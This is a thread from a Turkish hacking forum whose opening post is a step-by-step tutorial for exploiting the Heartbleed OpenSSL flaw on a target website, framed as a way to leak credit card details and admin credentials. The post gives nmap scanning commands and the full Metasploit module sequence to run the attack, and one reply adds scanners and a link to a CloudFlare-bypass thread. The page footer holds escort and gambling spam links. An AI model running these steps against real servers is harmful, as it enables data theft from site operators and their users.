HeartBleed

Pâtya

Spys-Z
Katılım
27 Ağu 2017
Mesajlar
168
Tepkime puanı
0
Puanları
0
Web sitesi
ajanlar.org
[font=Roboto, sans-serif]Gerekenler[/font][font=Roboto, sans-serif]:[/font]
[font=Roboto, sans-serif]Nmap ve Metasploit(kali,backtrack,parrot gibi linux dağıtımlarında yüklü gelir zaten windowsta yapacaksanız indirmeniz lazım bide windowsta nmapa script eklemek uğraştırır ben kali linux üzerinden yapacam anlatımı windows içinde kodlar vs aynı)[/font]
[font=Roboto, sans-serif]Heartbleed Nedir?[/font]
[font=Roboto, sans-serif]Heartbleed openssl kullanan sitelerde bulunma ihtimali olan bir güvenlik açığıdır. Eğer sitede heartbleed açığı varsa sunucu belleğinden bilgi sızdırmak mümkün bunlara kredi kartı bilgileri ve admin panel giriş bilgileride dahil. Ama tabiki databasenin tamamını çekmez %100 yararlı bir bilgi çıkacak diye birşey yok yani.[/font]
[font=Roboto, sans-serif]Hack İşlemi :[/font]
[font=Roboto, sans-serif]heartbleed açığı openssl kullanan sitelerde bulunur yani herşeyde önce sitenin http:// deil https:// olması lazım yani 443. portu açık olmalı hemen hedef sitede port taraması yapalım[/font]

PHP:
nmap -A hedef.com
[font=Roboto, sans-serif]yazdık bu komut bize birçok bilgi verecek çıkan sonuçta açık portlar kısmına gelelim eğer çıkan sonuçta 443/tcp open yazıyorsa ssl var yani heartbleed açığı bulunabilir.[/font]
[font=Roboto, sans-serif]Şimdi heartbleed açığı varmı bunu tarayalım:[/font]

PHP:
nmap -sV --script=ssl-heartbleed hedefsite.com
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]yazdık. eğer heartbleed açığı varsa çıkan sonuçta "443/tcp open" kısmının altında ssl-heartbleed yazar. Eğer heartbleed açığı varsa şu şekilde açığı exploit edeceksiniz:[/font]
[font=Roboto, sans-serif]metasploit i açalım[/font][/font][/size]

PHP:
msfconsole
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]açtık. şimdi kullanacağımız modülü seçelim:[/font][/font][/size][/font][/size]

PHP:
use auxiliary/scanner/ssl/openssl_heartbleed
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]ve modülümüzü de seçtik. bizden istediği ayarlara bakalım:[/font][/font][/size][/font][/size][/font][/size]

PHP:
show options
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]şimdi hedefimizi girelim:[/font][/font][/size][/font][/size][/font][/size][/font][/size]

PHP:
set RHOSTS hedef.com
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]gireceğimiz diğer ayar:[/font]
[/font][/size]
[/font][/size]
[/font][/size]
[/font][/size]
[/font][/size]

PHP:
set verbose true
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]Son kod:[/font][/font][/size][/font][/size][/font][/size][/font][/size]

PHP:
exploit
[font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif][size=small][font=Roboto, sans-serif]
M54Ypc.gif
[/font]
[/font][/size][/font][/size][/font][/size][/font][/size]
 

Berna

Forumdan Uzaklaştırıldı
Katılım
29 Eyl 2017
Mesajlar
69
Tepkime puanı
0
Puanları
0
eline sağlık :) :>:
 

XeonisH4wkz

Özel Üye
Katılım
6 Eki 2016
Mesajlar
14
Tepkime puanı
0
Puanları
1
Yaş
26
bide derdi ki ben veb heçk bilmem :D - eline sağlık
 

Trsz_kwT

Özel Üye
Katılım
2 Ara 2017
Mesajlar
467
Tepkime puanı
0
Puanları
0
Netcraft verilerine göre:
Sitelerin %66'sı OpenSSL kullansa da, 8 Nisan 2014 itibariyle bunlardan yalnızca %17'si Heartbleed açığından etkilenmektedir.

Açık en az 3 seneden beri vardır...
Bu süre içinde OpenSSL 1.0.1 ve 1.0.1f sürümünü kullananlar tehlike altında olabilir.

Bugüne kadar kayıtlara geçen hiçbir Heartbleed saldırısı bulunmamaktadır.

OpenSSL, oldukça yaygın olarak kullanılsa da Heartbleed açığı kullanılan sistemlerin yapılandırma durumuna göre değişir...

Kimlere işlemez:
- OpenSSL yeni sürümünü kullananlara,
- OpenSSL'yi heartbeat işlevini etkinleştirmeden derleyenlere,
- OpenSSL'nin 1.0.0 veya daha önceki sürümlerinden birini kullanıyorsa...

Çünkü bu açık OpenSSL'nin 1.0.0 sürümlerinde vardır...


Bu kadar uğraşmak yerine kolayca:

https://sslanalyzer.comodoca.com/heartbleed.html
https://www.crowdstrike.com/resources/community-tools/cs-heartbleed-scanner/
https://filippo.io/Heartbleed/
https://lastpass.com/heartbleed/
http://hackersonlineclub.com/heartbleed/


sitelerinden online tarama yaptırılarak açık aranabilir...


Yada bu proje kullanılarak;
https://github.com/FiloSottile/Heartbleed


Ayrıca artık çoğu https kullanan site DDOS saldırılarını engellemek için CloudFlare kullanıyor.
Bu gibi durumlarda nmap tarama yapamaz.

CloudFlare nasıl bypass yapılır konusunu açtım...
Oradan okuyunuz...
http://ajanlar.org/konu-cloudflare-bypass-yontemleri-2017-15-yontem.zz?pid=220972
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012